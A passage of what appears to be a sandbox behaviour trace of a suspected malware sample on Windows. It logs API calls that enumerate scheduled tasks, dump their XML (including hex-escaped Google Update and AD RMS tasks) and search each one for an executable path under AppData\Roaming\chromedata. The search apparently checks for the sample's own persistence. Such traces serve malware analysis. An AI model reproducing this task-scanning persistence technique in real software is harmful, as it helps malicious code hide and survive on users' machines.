\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0098.239] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.283] IUnknown:Release (This=0x632340) returned 0x0
	[0098.283] IUnknown:Release (This=0x6322c8) returned 0x0
	[0098.283] ITaskFolder:GetFolders (in: This=0x632298, flags=0, ppFolders=0x12917c | out: ppFolders=0x12917c*=0x6322c8) returned 0x0
	[0098.287] ITaskFolderCollection:get_Count (in: This=0x6322c8, pCount=0x129174 | out: pCount=0x129174*=3) returned 0x0
	[0098.287] ITaskFolderCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12919c | out: ppFolder=0x12919c*=0x632348) returned 0x0
	[0098.288] ITaskFolder:GetTasks (in: This=0x632348, flags=1, ppTasks=0x129070 | out: ppTasks=0x129070*=0x632398) returned 0x0
	[0098.289] IRegisteredTaskCollection:get_Count (in: This=0x632398, pCount=0x129060 | out: pCount=0x129060*=0) returned 0x0
	[0098.289] IUnknown:Release (This=0x632398) returned 0x0
	[0098.289] ITaskFolder:GetFolders (in: This=0x632348, flags=0, ppFolders=0x129064 | out: ppFolders=0x129064*=0x632398) returned 0x0
	[0098.292] ITaskFolderCollection:get_Count (in: This=0x632398, pCount=0x12905c | out: pCount=0x12905c*=2) returned 0x0
	[0098.292] ITaskFolderCollection:get_Item (in: This=0x632398, index=0x128f64*(varType=0x3, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x129084 | out: ppFolder=0x129084*=0x63fcd0) returned 0x0
	[0098.292] ITaskFolder:GetTasks (in: This=0x63fcd0, flags=1, ppTasks=0x128f58 | out: ppTasks=0x128f58*=0x63fd30) returned 0x0
	[0098.294] IRegisteredTaskCollection:get_Count (in: This=0x63fd30, pCount=0x128f48 | out: pCount=0x128f48*=0) returned 0x0
	[0098.294] IUnknown:Release (This=0x63fd30) returned 0x0
	[0098.294] ITaskFolder:GetFolders (in: This=0x63fcd0, flags=0, ppFolders=0x128f4c | out: ppFolders=0x128f4c*=0x63fd30) returned 0x0
	[0098.351] ITaskFolderCollection:get_Count (in: This=0x63fd30, pCount=0x128f44 | out: pCount=0x128f44*=45) returned 0x0
	[0098.351] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.351] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fed8) returned 0x0
	[0098.356] IRegisteredTaskCollection:get_Count (in: This=0x63fed8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0098.356] IRegisteredTaskCollection:get_Item (in: This=0x63fed8, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690080) returned 0x0
	[0098.356] IRegisteredTask:get_Name (in: This=0x1690080, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Automated)") returned 0x0
	[0098.356] IRegisteredTask:get_Xml (in: This=0x1690080, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.366] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6002)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"7dba1862-fdda-4030-83de-895375c111d4\">\r\n      <StartBoundary>2006-11-09T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      